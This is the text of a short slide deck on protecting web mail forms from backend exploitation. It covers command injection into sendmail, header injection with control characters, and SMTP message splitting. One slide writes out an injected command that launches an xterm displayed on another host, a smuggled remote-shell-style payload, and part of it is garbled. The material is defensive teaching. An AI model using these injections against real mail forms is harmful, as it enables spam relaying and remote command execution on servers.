Avoiding Backend Exploitation of Mail Forms

1
Avoiding BackendExploitation of Mail Forms

• Max Kessler, LPIC-1

2
OWASP Top 10 List

• 1 Unvalidated user input
• 2 Broken access control (sort of)
• 6 Injection flaws

3
How do mail forms work?

• A user types in their name, address and a
  message.
• Their data are sent to the web server in an HTTP
  request.
• The server runs a script that formats the text
  for consumption by a mail server, then feeds it
  to the mail server.

4
User input on the command line

• Exploit 1 insert semicolon/ampersand
• The command should be
• /bin/sh /usr/sbin/sendmail -f max_at_example.com \
  user1_at_example.com
• The command is
• /bin/sh /usr/sbin/sendmail -f max_at_example.com \
  xterm -display 192.168.0.2010echo \
  user1_at_example.com

5
Replay with control characters

• Exploit 2 insert control characters
• E-mail address should be
• max_at_example.com
• E-mail address is
• max_at_example.com
• To user2_at_example.com, user3_at_example.com

6
Starting a new message

• Exploit 3 using '.' to start a new message
• SMTP servers allow multiple messages to be sent
  through a single connection. A new message is
  started by putting a '.' on a line by itself.